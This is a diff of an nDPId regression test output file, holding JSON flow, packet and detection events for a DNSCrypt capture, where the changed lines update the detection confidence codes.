00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAXcSFogAH4RFuAKAAABLuPIN4HeIPsGBEfaFc4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":510,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396070} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":510,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAABQSFkAuX4RO7QKAAABLuPINwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":511,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396070} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":511,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAABQSFoAuX4RO7MKAAABLuPINwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396070,"pkt":"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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAXcSFwgAH4RFt4KAAABLuPIN6yBIPsGBB0zFdIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":514,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396070} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":514,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAABQSFwAuX4RO7EKAAABLuPINwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAIcSF1AAH4R+pwKAAABLuPIN8AZIPsCCLnwFc8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":946739396071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739396071,"pkt":"ZmZmZmZmRERERERECABFAADTkQhAADcR9haQW2rjCgAAAQG71CEAvwNXZlqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"} 
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":946739396071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739396071,"pkt":"ZmZmZmZmRERERERECABFAADTkQVAADcR9hmQW2rjCgAAAQG7vKwAvxrIZl6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":2,"flow_last_seen":946739396073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739396073,"pkt":"ZmZmZmZmRERERERECABFAADTkQdAADcR9heQW2rjCgAAAQG7vG0AvxsMZlmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"} 
@@ -1056,24 +1056,24 @@ 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":946739396110,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739396110,"pkt":"ZmZmZmZmRERERERECABFAADWzC9AADcRvxAu48g3CgAAASD7rIEAwu03FdKAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAADn5TxO0FAodB0MfyNII\/q4yfvBzna8lha8rHqMZH6brB0hzmteXf96oRMNtUVCp592lxf62HHwuDSbhBbtGtQcalorpuHO8PTt\/PSXI1nToKeQ\/\/4xUAF+WFp6Iz9p9KhqWium4c7w9AAAAAV7URQBxousA"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396111,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
